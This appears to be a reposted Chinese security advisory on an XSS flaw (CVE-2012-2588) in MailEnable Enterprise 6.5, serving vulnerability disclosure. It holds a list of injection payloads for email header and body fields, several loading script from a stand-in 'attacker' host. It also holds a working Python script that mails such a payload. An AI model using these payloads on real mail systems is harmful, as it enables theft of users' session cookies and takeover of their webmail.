发布日期:2012-08-08
更新日期:2012-08-09受影响系统:
MailEnable MailEnable Enterprise 6.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54900
CVE ID: CVE-2012-2588MailEnable Enterprise是一款邮件服务器。MailEnable Enterprise 6.5及其他版本在实现上存在HTML注入漏洞,攻击者可提供HTML或JS代码,在受影响站点中运行,窃取Cookie身份验证凭证或控制站点外观。
<*来源:loneferret
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python"""Author: loneferret of Offensive Security
Product: MailEnable Enterprise
Version: 6.5
Vendor Site: http://www.mailenable.com
Software Download: http://www.mailenable.com/download.aspTimeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public DisclosureInstalled On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9
Injection Point: From
Injection Payload(s):
1: ";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}Injection Point: Body
Injection Payload(s):
1: ";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}Injection Point: To
Injection Payload(s):
1: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
2: </TITLE><SCRIPT>alert("XSS");</SCRIPT>Injection Point: Subject
Injection Payload(s):
1: <SCRIPT>alert("XSS")</SCRIPT>
2: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
3: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
4: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
5: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT>
6: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
7: <SCRIPT a=">">" SRC="http://attacker/xss.js"></SCRIPT>
8: <SCRIPT "a=">"" SRC="http://attacker/xss.js"></SCRIPT>
9: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
10: <SCRIPT a="blah" "" SRC="http://attacker/xss.js"></SCRIPT>
11: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT>
12: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT>
13: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
14: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
15: <<SCRIPT>alert("XSS");//<</SCRIPT>
16: <IFRAME SRC="javascript:alert("XSS");"></IFRAME>"""
#!/usr/bin/python
import smtplib, urllib2payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: hacker@offsec.local
"
msg += "To: victim@victim.local
"
msg += "Date: Today
"
msg += "Subject: XSS" + payload + "
"
msg += "Content-type: text/html
"
msg += "XSS.
"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)建议:
--------------------------------------------------------------------------------
厂商补丁:MailEnable
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.mailenable.com/SmarterMail "Body"字段HTML注入漏洞Axigen Mail Server "Body"字段HTML注入漏洞相关资讯 HTML注入漏洞 MailEnable Enterprise
- Symantec Security Information (07/05/2013 16:04:54)
- Django CMS "page_attribute" (01/29/2013 10:18:23)
- IBM Intelligent Operations (12/20/2012 08:24:59)
| - TP-Link TL-WA701N和TL-WA701ND目 (03/01/2013 21:04:10)
- Advantech WebAccess HMI/SCADA (01/10/2013 08:07:25)
- MyBB User Profile Skype ID插件“ (12/19/2012 18:55:16)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权
|